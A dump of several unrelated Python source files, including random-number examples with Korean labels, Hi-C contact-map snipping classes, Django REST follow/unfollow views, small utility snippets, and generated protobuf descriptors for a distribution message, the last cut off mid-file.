print(f'0~10까지 랜덤 정수: {int(random.random() * 10)+1}')
print(f'0~2까지 랜덤 정수: {int(random.random() * 10)%3}')
print(f'시작 <= r < 끝 랜덤 실수: {random.uniform(2.5 , 10.0)}')
print(f'0~9까지 랜덤 정수: {random.randrange(9+1)}')
print(f'0~10까지 랜덤 정수: {random.randrange(1, 10+1)}')
print(f'0~10까지 랜덤 정수: {random.randint(1, 10)}')
print(f'0~2까지 랜덤 정수: {random.randrange(0,2)}')
season = ['봄', '여름', '가을', '겨울']
print(f'season 중 랜덤한 하나 요소 :{random.choice(season)}')
foods = ['핫도그','토스트','비빔면']
print(f'오늘 뭐 먹을래? {random.choice(foods)}')
반3 = list(range(1, 17+1))
반3.remove(4)
print(반3)
random.shuffle(반3)
print(반3)
print(random.sample(반3, 3))
|
996,160 | 5c2d9e93686756b1dd62fdea6bc1c09c8c9dd908 | import os
import numpy as np
import pandas as pd
import scipy.sparse as sp
from scipy.interpolate import interp1d
import scipy.signal as signal
import multiprocess as mp
import cooler
import cooltools.snipping as snipping
from cooltools.lib.numutils import logbins
import bioframe
from mirnylib.numutils import zoomArray
import DNA_info
def clean_up_loops(loop_list, arms):
'''Removes items for loop_list that are either not in any of the regions contained in arms or is contained
in a region between two of the regions in arms. Use this to clean up a new list of loops and save the
modified list for future use.'''
for each in ['chrom1', 'chrom2', 'pos1', 'pos2']:
assert each in loop_list.columns
features = loop_list.copy(deep=True)
features['index1'] = -1
features['index2'] = -1
for i, arm in enumerate(arms):
chrom = arm[0]
start = arm[1]
end = arm[2]
features['index1'] = features.apply(lambda x: i
if (x['chrom1']==chrom and x['pos1'] > start)
and x['pos1'] < end else x['index1'], axis=1)
features['index2'] = features.apply(lambda x: i
if (x['chrom2']==chrom and x['pos2'] > start)
and x['pos2'] < end else x['index2'], axis=1)
features = features[np.logical_or(features.index1 != -1, features.index2 != -1)]
features = features[features.index1 == features.index2]
features = features[['chrom1', 'pos1', 'chrom2', 'pos2']]
return features
def sparseSymmetricOOE(matrix, mask, log_binning=True):
'''Quick OOE operation for sparse symmetric matrices. This will be used by the LocalObsOverExp object to
compute OOE on support regions.'''
if matrix.shape[0] == 1:
return matrix
#Finding number of valid bins per diagonal using FFT convolve
count_per_diag = signal.fftconvolve(mask, mask[::-1], mode='full')
count_per_diag = np.round(count_per_diag[len(count_per_diag)//2:])
count_per_diag = count_per_diag.astype(int)
row, col, data = matrix.row, matrix.col, matrix.data
nan_indices = ~np.isfinite(data)
data[nan_indices]=0
diff = abs(row-col)
#Summing by diagonal
scaling = np.bincount(diff, weights=data, minlength=len(count_per_diag))/2
assert len(scaling)==len(count_per_diag)
if log_binning:
hi = len(scaling)
lo = 1
ratio = 1.2
N = int(np.log(hi / lo) / np.log(ratio))
bins = logbins(1, len(scaling), N=N)
bin_mids = np.sqrt(bins[1:]*bins[0:-1])
lab = np.concatenate(tuple((i+1)*np.ones(bins[i+1]-bins[i], dtype=int) for i in range(len(bins)-1)))
log_scaling = np.bincount(lab,weights=scaling[1:])
log_count = np.bincount(lab, weights=count_per_diag[1:])
coarse_expected = log_scaling[1:]/log_count[1:]
f = interp1d(np.log10(bin_mids), np.log10(coarse_expected), kind='linear')
y = f(np.log10(np.arange(2,np.floor(bin_mids[-1]))))
x = np.log10(np.arange(2,np.floor(bin_mids[-1])))
xremaining = np.log10(np.arange(np.round(10**x[-1]+1),len(scaling)))
yremaining = y[-1] + ((y[-1]-y[-2])/(x[-1]-x[-2]))*(xremaining - x[-1])
x = np.append(x,xremaining)
y = np.append(y,yremaining)
fine_expected = 10**y
fine_bins = np.round(10**x)
for i in range(1,-1,-1):
fine_expected = np.insert(fine_expected,0,scaling[i]/count_per_diag[i])
fine_bins = np.insert(fine_bins,0,i).astype(int)
assert np.all((fine_bins[1:]-fine_bins[0:-1])==1)
else:
fine_expected = scaling/count_per_diag
matrix.data = data/fine_expected[diff]
# matrix.data[nan_indices] = np.nan
return matrix
class LocalObsExpSnipper:
'''Object whose methods are fed to cooltools.snipping.pileup function. Only works if regions that
are fed to the select method are the same i.e. region1 MUST BE SAME AS region2.'''
def __init__(self, clr, cooler_opts=None, log_binning=True):
self.clr = clr
self.log_binning = log_binning
self.binsize = self.clr.binsize
self.offsets = {}
self.pad = True
self.cooler_opts = {} if cooler_opts is None else cooler_opts
self.cooler_opts.setdefault('sparse', True)
def select(self, region1, region2):
print(region1, region2)
self.offsets[region1] = self.clr.offset(region1) - self.clr.offset(region1[0])
self.offsets[region2] = self.clr.offset(region2) - self.clr.offset(region2[0])
matrix = (self.clr.matrix(**self.cooler_opts)
.fetch(region1, region2))
mask = self.clr.bins().fetch(region1)
mask = np.isfinite(mask['weight'].values).astype(int)
matrix = sparseSymmetricOOE(matrix, mask, log_binning=self.log_binning)
if self.cooler_opts['sparse']:
matrix = matrix.tocsr()
return matrix
def snip(self, matrix, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
if hi1 < 0 or hi2 < 0:
print(region1, s1, e1, region2, s2, e2)
print(offset1, offset2)
print(lo1, hi1, lo2, hi2)
assert hi1 >= 0
assert hi2 >= 0
m, n = matrix.shape
dm, dn = hi1 - lo1, hi2 - lo2
out_of_bounds = False
pad_left = pad_right = pad_bottom = pad_top = None
if lo1 < 0:
pad_bottom = -lo1
out_of_bounds = True
if lo2 < 0:
pad_left = -lo2
out_of_bounds = True
if hi1 > m:
pad_top = dm - (hi1 - m)
out_of_bounds = True
if hi2 > n:
pad_right = dn - (hi2 - n)
out_of_bounds = True
if out_of_bounds:
i0 = max(lo1, 0)
i1 = min(hi1, m)
j0 = max(lo2, 0)
j1 = min(hi2, n)
snippet = np.full((dm, dn), 0.0)
snippet[pad_bottom:pad_top,
pad_left:pad_right] = matrix[i0:i1, j0:j1].toarray().astype(float)
# print(m,n)
# print(i0, i1, j0, j1)
# print(matrix[i0:i1, j0:j1].toarray().astype(float).shape)
# print(snippet[pad_bottom:pad_top, pad_left:pad_right].shape)
else:
snippet = matrix[lo1:hi1, lo2:hi2].toarray().astype(float)
nan_rows = np.sum(snippet, axis=0) == 0
nan_cols = np.sum(snippet, axis=1) == 0
snippet[nan_rows, :] = np.nan
snippet[:, nan_cols] = np.nan
return snippet
class DifferenceSnipper:
'''Object whose methods are fed to cooltools.snipping.pileup function. Only works if regions that
are fed to the select method are the same i.e. region1 MUST BE SAME AS region2.'''
def __init__(self, clr1, clr2, cooler_opts=None, log_binning=True):
self.clr1 = clr1
self.clr2 = clr2
self.log_binning = log_binning
assert clr1.binsize == clr2.binsize
self.binsize = self.clr1.binsize
self.offsets = {}
self.pad = True
self.cooler_opts = {} if cooler_opts is None else cooler_opts
self.cooler_opts.setdefault('sparse', True)
def select(self, region1, region2):
print(region1, region2)
self.offsets[region1] = self.clr1.offset(region1) - self.clr1.offset(region1[0])
self.offsets[region2] = self.clr1.offset(region2) - self.clr1.offset(region2[0])
matrix1 = (self.clr1.matrix(**self.cooler_opts)
.fetch(region1, region2))
matrix2 = (self.clr2.matrix(**self.cooler_opts)
.fetch(region1, region2))
mask1 = self.clr1.bins().fetch(region1)
mask1 = np.isfinite(mask1['weight'].values).astype(int)
mask2 = self.clr2.bins().fetch(region1)
mask2 = np.isfinite(mask2['weight'].values).astype(int)
matrix1 = sparseSymmetricOOE(matrix1, mask1, log_binning=self.log_binning)
matrix2 = sparseSymmetricOOE(matrix2, mask2, log_binning=self.log_binning)
matrix = sp.coo_matrix(matrix1.todense() - matrix2.todense())
if self.cooler_opts['sparse']:
matrix = matrix.tocsr()
return matrix
def snip(self, matrix, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
if hi1 < 0 or hi2 < 0:
print(region1, s1, e1, region2, s2, e2)
print(offset1, offset2)
print(lo1, hi1, lo2, hi2)
assert hi1 >= 0
assert hi2 >= 0
m, n = matrix.shape
dm, dn = hi1 - lo1, hi2 - lo2
out_of_bounds = False
pad_left = pad_right = pad_bottom = pad_top = None
if lo1 < 0:
pad_bottom = -lo1
out_of_bounds = True
if lo2 < 0:
pad_left = -lo2
out_of_bounds = True
if hi1 > m:
pad_top = dm - (hi1 - m)
out_of_bounds = True
if hi2 > n:
pad_right = dn - (hi2 - n)
out_of_bounds = True
if out_of_bounds:
i0 = max(lo1, 0)
i1 = min(hi1, m)
j0 = max(lo2, 0)
j1 = min(hi2, n)
snippet = np.full((dm, dn), 0.0)
snippet[pad_bottom:pad_top,
pad_left:pad_right] = matrix[i0:i1, j0:j1].toarray().astype(float)
# print(m,n)
# print(i0, i1, j0, j1)
# print(matrix[i0:i1, j0:j1].toarray().astype(float).shape)
# print(snippet[pad_bottom:pad_top, pad_left:pad_right].shape)
else:
snippet = matrix[lo1:hi1, lo2:hi2].toarray().astype(float)
nan_rows = np.sum(snippet, axis=0) == 0
nan_cols = np.sum(snippet, axis=1) == 0
snippet[nan_rows, :] = np.nan
snippet[:, nan_cols] = np.nan
return snippet
class RatioSnipper:
'''Object whose methods are fed to cooltools.snipping.pileup function. Only works if regions that
are fed to the select method are the same i.e. region1 MUST BE SAME AS region2.'''
def __init__(self, clr1, clr2, cooler_opts=None, log_binning=True):
self.clr1 = clr1
self.clr2 = clr2
self.log_binning = log_binning
assert clr1.binsize == clr2.binsize
self.binsize = self.clr1.binsize
self.offsets = {}
self.pad = True
self.cooler_opts = {} if cooler_opts is None else cooler_opts
self.cooler_opts.setdefault('sparse', True)
def select(self, region1, region2):
print(region1, region2)
self.offsets[region1] = self.clr1.offset(region1) - self.clr1.offset(region1[0])
self.offsets[region2] = self.clr1.offset(region2) - self.clr1.offset(region2[0])
matrix1 = (self.clr1.matrix(**self.cooler_opts)
.fetch(region1, region2))
matrix2 = (self.clr2.matrix(**self.cooler_opts)
.fetch(region1, region2))
mask1 = self.clr1.bins().fetch(region1)
mask1 = np.isfinite(mask1['weight'].values).astype(int)
mask2 = self.clr2.bins().fetch(region1)
mask2 = np.isfinite(mask2['weight'].values).astype(int)
matrix1 = sparseSymmetricOOE(matrix1, mask1, log_binning=self.log_binning)
matrix2 = sparseSymmetricOOE(matrix2, mask2, log_binning=self.log_binning)
matrix1 = matrix1.todense()
matrix1[matrix1==0] = 1
matrix2 = matrix2.todense()
matrix2[matrix2==0] = 1
matrix = matrix1/matrix2
# if self.cooler_opts['sparse']:
# matrix = matrix.tocsr()
return matrix
def snip(self, matrix, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
if hi1 < 0 or hi2 < 0:
print(region1, s1, e1, region2, s2, e2)
print(offset1, offset2)
print(lo1, hi1, lo2, hi2)
assert hi1 >= 0
assert hi2 >= 0
m, n = matrix.shape
dm, dn = hi1 - lo1, hi2 - lo2
out_of_bounds = False
pad_left = pad_right = pad_bottom = pad_top = None
if lo1 < 0:
pad_bottom = -lo1
out_of_bounds = True
if lo2 < 0:
pad_left = -lo2
out_of_bounds = True
if hi1 > m:
pad_top = dm - (hi1 - m)
out_of_bounds = True
if hi2 > n:
pad_right = dn - (hi2 - n)
out_of_bounds = True
if out_of_bounds:
i0 = max(lo1, 0)
i1 = min(hi1, m)
j0 = max(lo2, 0)
j1 = min(hi2, n)
snippet = np.full((dm, dn), 0.0)
snippet[pad_bottom:pad_top,
pad_left:pad_right] = np.asarray(matrix[i0:i1, j0:j1]).astype(float)
# print(m,n)
# print(i0, i1, j0, j1)
# print(matrix[i0:i1, j0:j1].toarray().astype(float).shape)
# print(snippet[pad_bottom:pad_top, pad_left:pad_right].shape)
else:
snippet = np.asarray(matrix[lo1:hi1, lo2:hi2]).astype(float)
nan_rows = np.sum(snippet, axis=0) == 0
nan_cols = np.sum(snippet, axis=1) == 0
snippet[nan_rows, :] = np.nan
snippet[:, nan_cols] = np.nan
return snippet
class DifferenceSnipper:
'''Object whose methods are fed to cooltools.snipping.pileup function. Only works if regions that
are fed to the select method are the same i.e. region1 MUST BE SAME AS region2.'''
def __init__(self, clr1, clr2, cooler_opts=None, log_binning=True):
self.clr1 = clr1
self.clr2 = clr2
self.log_binning = log_binning
assert clr1.binsize == clr2.binsize
self.binsize = self.clr1.binsize
self.offsets = {}
self.pad = True
self.cooler_opts = {} if cooler_opts is None else cooler_opts
self.cooler_opts.setdefault('sparse', True)
def select(self, region1, region2):
print(region1, region2)
self.offsets[region1] = self.clr1.offset(region1) - self.clr1.offset(region1[0])
self.offsets[region2] = self.clr1.offset(region2) - self.clr1.offset(region2[0])
matrix1 = (self.clr1.matrix(**self.cooler_opts)
.fetch(region1, region2))
matrix2 = (self.clr2.matrix(**self.cooler_opts)
.fetch(region1, region2))
mask1 = self.clr1.bins().fetch(region1)
mask1 = np.isfinite(mask1['weight'].values).astype(int)
mask2 = self.clr2.bins().fetch(region1)
mask2 = np.isfinite(mask2['weight'].values).astype(int)
matrix1 = sparseSymmetricOOE(matrix1, mask1, log_binning=self.log_binning)
matrix2 = sparseSymmetricOOE(matrix2, mask2, log_binning=self.log_binning)
matrix1 = matrix1.todense()
matrix1[matrix1==0] = 1
matrix2 = matrix2.todense()
matrix2[matrix2==0] = 1
matrix = matrix1 - matrix2
# if self.cooler_opts['sparse']:
# matrix = matrix.tocsr()
return matrix
def snip(self, matrix, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
if hi1 < 0 or hi2 < 0:
print(region1, s1, e1, region2, s2, e2)
print(offset1, offset2)
print(lo1, hi1, lo2, hi2)
assert hi1 >= 0
assert hi2 >= 0
m, n = matrix.shape
dm, dn = hi1 - lo1, hi2 - lo2
out_of_bounds = False
pad_left = pad_right = pad_bottom = pad_top = None
if lo1 < 0:
pad_bottom = -lo1
out_of_bounds = True
if lo2 < 0:
pad_left = -lo2
out_of_bounds = True
if hi1 > m:
pad_top = dm - (hi1 - m)
out_of_bounds = True
if hi2 > n:
pad_right = dn - (hi2 - n)
out_of_bounds = True
if out_of_bounds:
i0 = max(lo1, 0)
i1 = min(hi1, m)
j0 = max(lo2, 0)
j1 = min(hi2, n)
snippet = np.full((dm, dn), 0.0)
snippet[pad_bottom:pad_top,
pad_left:pad_right] = np.asarray(matrix[i0:i1, j0:j1]).astype(float)
# print(m,n)
# print(i0, i1, j0, j1)
# print(matrix[i0:i1, j0:j1].toarray().astype(float).shape)
# print(snippet[pad_bottom:pad_top, pad_left:pad_right].shape)
else:
snippet = np.asarray(matrix[lo1:hi1, lo2:hi2]).astype(float)
nan_rows = np.sum(snippet, axis=0) == 0
nan_cols = np.sum(snippet, axis=1) == 0
snippet[nan_rows, :] = np.nan
snippet[:, nan_cols] = np.nan
return snippet |
996,161 | 2d2a164adb548781b4f27aa3e7e41d96e70e50f6 | from django.shortcuts import get_object_or_404
from rest_framework.generics import (
ListCreateAPIView, ListAPIView, DestroyAPIView
)
from rest_framework.permissions import IsAuthenticated
from accounts.models import User
from .models import Follow
from .serializers import FolloweeSerializer, FollowSerializer
class FollowingView(ListCreateAPIView):
permission_classes = (IsAuthenticated,)
def get_queryset(self):
return self.request.user.following.all()
def get_serializer_class(self):
if self.request.method == 'POST':
return FollowSerializer
return FolloweeSerializer
def perform_create(self, serializer):
serializer.save(follower=self.request.user)
class FollowerView(ListAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = FolloweeSerializer
def get_queryset(self):
return self.request.user.followers.all()
class FollowerListView(ListAPIView):
serializer_class = FolloweeSerializer
def get_queryset(self):
user = get_object_or_404(User, pk=self.kwargs['pk'])
return user.followers.all()
class FollowingListView(ListAPIView):
serializer_class = FolloweeSerializer
def get_queryset(self):
user = get_object_or_404(User, pk=self.kwargs['pk'])
return user.following.all()
class UnfollowView(DestroyAPIView):
permission_classes = (IsAuthenticated,)
def get_queryset(self):
return self.request.user.following.all()
def perform_destroy(self, instance):
rel = Follow.objects.get(from_user=self.request.user, to_user=instance)
rel.delete()
|
996,162 | 5be9b3f252dbfe8d7deedcb5c04d6a746c93a9d0 | class Songs(object):
def __init__(self, lyrics):
self.lyrics = lyrics
def sing_a_song(self):
for line in self.lyrics:
print(line)
alphaand = Songs(["Reach into the nothingness",
"Consuming your sight"])
alphaand.sing_a_song()
mechanobiology = ["Contact, ended abruptly.","Signal lost, and without warning"]
mechanobiology_singer = Songs(mechanobiology)
mechanobiology_singer.sing_a_song() |
996,163 | 8f9fcd0dc60ca40e69e708c66ee06267dbb3ebc9 |
import torchvision.transforms as transforms
class Augmentation:
def __init__(self):
self.transform = transforms.Compose([transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))])
def getTransform(self):
return self.transform |
996,164 | 83197baefd0261892befe9ee293a5bdbce4a68ce | # THIS IS FILE-1
def add(a,b,c):
return a+b+c
def subtract(a,b):
return a-b
#Multiply function deleted here
def remainder(a,b):
return a%b
def greater(a,b):
return a if a>b else b
|
996,165 | c020cbc99483f8207d9666810658c4c94d27a0bc | __version__ = "1.1.0"
default_app_config = "modoboa_demo.apps.DemoConfig"
|
996,166 | f52dc64e28679d82c144b8fbff34a63e71e70f74 | from django.apps import AppConfig
class QueryintentionConfig(AppConfig):
name = 'queryIntention'
|
996,167 | 4f29d707ddd0eee1bf8749f3a6d9b3dfa4d0a818 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/api/distribution.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import any_pb2 as google_dot_protobuf_dot_any__pb2
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/api/distribution.proto",
package="google.api",
syntax="proto3",
serialized_options=b"\n\016com.google.apiB\021DistributionProtoP\001ZCgoogle.golang.org/genproto/googleapis/api/distribution;distribution\242\002\004GAPI",
serialized_pb=b'\n\x1dgoogle/api/distribution.proto\x12\ngoogle.api\x1a\x19google/protobuf/any.proto\x1a\x1fgoogle/protobuf/timestamp.proto"\xd9\x06\n\x0c\x44istribution\x12\r\n\x05\x63ount\x18\x01 \x01(\x03\x12\x0c\n\x04mean\x18\x02 \x01(\x01\x12 \n\x18sum_of_squared_deviation\x18\x03 \x01(\x01\x12-\n\x05range\x18\x04 \x01(\x0b\x32\x1e.google.api.Distribution.Range\x12>\n\x0e\x62ucket_options\x18\x06 \x01(\x0b\x32&.google.api.Distribution.BucketOptions\x12\x15\n\rbucket_counts\x18\x07 \x03(\x03\x12\x34\n\texemplars\x18\n \x03(\x0b\x32!.google.api.Distribution.Exemplar\x1a!\n\x05Range\x12\x0b\n\x03min\x18\x01 \x01(\x01\x12\x0b\n\x03max\x18\x02 \x01(\x01\x1a\xb5\x03\n\rBucketOptions\x12G\n\x0elinear_buckets\x18\x01 \x01(\x0b\x32-.google.api.Distribution.BucketOptions.LinearH\x00\x12Q\n\x13\x65xponential_buckets\x18\x02 \x01(\x0b\x32\x32.google.api.Distribution.BucketOptions.ExponentialH\x00\x12K\n\x10\x65xplicit_buckets\x18\x03 \x01(\x0b\x32/.google.api.Distribution.BucketOptions.ExplicitH\x00\x1a\x43\n\x06Linear\x12\x1a\n\x12num_finite_buckets\x18\x01 \x01(\x05\x12\r\n\x05width\x18\x02 \x01(\x01\x12\x0e\n\x06offset\x18\x03 \x01(\x01\x1aO\n\x0b\x45xponential\x12\x1a\n\x12num_finite_buckets\x18\x01 \x01(\x05\x12\x15\n\rgrowth_factor\x18\x02 \x01(\x01\x12\r\n\x05scale\x18\x03 \x01(\x01\x1a\x1a\n\x08\x45xplicit\x12\x0e\n\x06\x62ounds\x18\x01 \x03(\x01\x42\t\n\x07options\x1as\n\x08\x45xemplar\x12\r\n\x05value\x18\x01 \x01(\x01\x12-\n\ttimestamp\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12)\n\x0b\x61ttachments\x18\x03 \x03(\x0b\x32\x14.google.protobuf.AnyBq\n\x0e\x63om.google.apiB\x11\x44istributionProtoP\x01ZCgoogle.golang.org/genproto/googleapis/api/distribution;distribution\xa2\x02\x04GAPIb\x06proto3',
dependencies=[
google_dot_protobuf_dot_any__pb2.DESCRIPTOR,
google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,
],
)
_DISTRIBUTION_RANGE = _descriptor.Descriptor(
name="Range",
full_name="google.api.Distribution.Range",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="min",
full_name="google.api.Distribution.Range.min",
index=0,
number=1,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="max",
full_name="google.api.Distribution.Range.max",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=373,
serialized_end=406,
)
_DISTRIBUTION_BUCKETOPTIONS_LINEAR = _descriptor.Descriptor(
name="Linear",
full_name="google.api.Distribution.BucketOptions.Linear",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="num_finite_buckets",
full_name="google.api.Distribution.BucketOptions.Linear.num_finite_buckets",
index=0,
number=1,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="width",
full_name="google.api.Distribution.BucketOptions.Linear.width",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="offset",
full_name="google.api.Distribution.BucketOptions.Linear.offset",
index=2,
number=3,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=659,
serialized_end=726,
)
_DISTRIBUTION_BUCKETOPTIONS_EXPONENTIAL = _descriptor.Descriptor(
name="Exponential",
full_name="google.api.Distribution.BucketOptions.Exponential",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="num_finite_buckets",
full_name="google.api.Distribution.BucketOptions.Exponential.num_finite_buckets",
index=0,
number=1,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="growth_factor",
full_name="google.api.Distribution.BucketOptions.Exponential.growth_factor",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="scale",
full_name="google.api.Distribution.BucketOptions.Exponential.scale",
index=2,
number=3,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=728,
serialized_end=807,
)
_DISTRIBUTION_BUCKETOPTIONS_EXPLICIT = _descriptor.Descriptor(
name="Explicit",
full_name="google.api.Distribution.BucketOptions.Explicit",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="bounds",
full_name="google.api.Distribution.BucketOptions.Explicit.bounds",
index=0,
number=1,
type=1,
cpp_type=5,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=809,
serialized_end=835,
)
_DISTRIBUTION_BUCKETOPTIONS = _descriptor.Descriptor(
name="BucketOptions",
full_name="google.api.Distribution.BucketOptions",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="linear_buckets",
full_name="google.api.Distribution.BucketOptions.linear_buckets",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="exponential_buckets",
full_name="google.api.Distribution.BucketOptions.exponential_buckets",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="explicit_buckets",
full_name="google.api.Distribution.BucketOptions.explicit_buckets",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_DISTRIBUTION_BUCKETOPTIONS_LINEAR,
_DISTRIBUTION_BUCKETOPTIONS_EXPONENTIAL,
_DISTRIBUTION_BUCKETOPTIONS_EXPLICIT,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="options",
full_name="google.api.Distribution.BucketOptions.options",
index=0,
containing_type=None,
fields=[],
)
],
serialized_start=409,
serialized_end=846,
)
_DISTRIBUTION_EXEMPLAR = _descriptor.Descriptor(
name="Exemplar",
full_name="google.api.Distribution.Exemplar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="value",
full_name="google.api.Distribution.Exemplar.value",
index=0,
number=1,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="timestamp",
full_name="google.api.Distribution.Exemplar.timestamp",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="attachments",
full_name="google.api.Distribution.Exemplar.attachments",
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=848,
serialized_end=963,
)
_DISTRIBUTION = _descriptor.Descriptor(
name="Distribution",
full_name="google.api.Distribution",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="count",
full_name="google.api.Distribution.count",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="mean",
full_name="google.api.Distribution.mean",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="sum_of_squared_deviation",
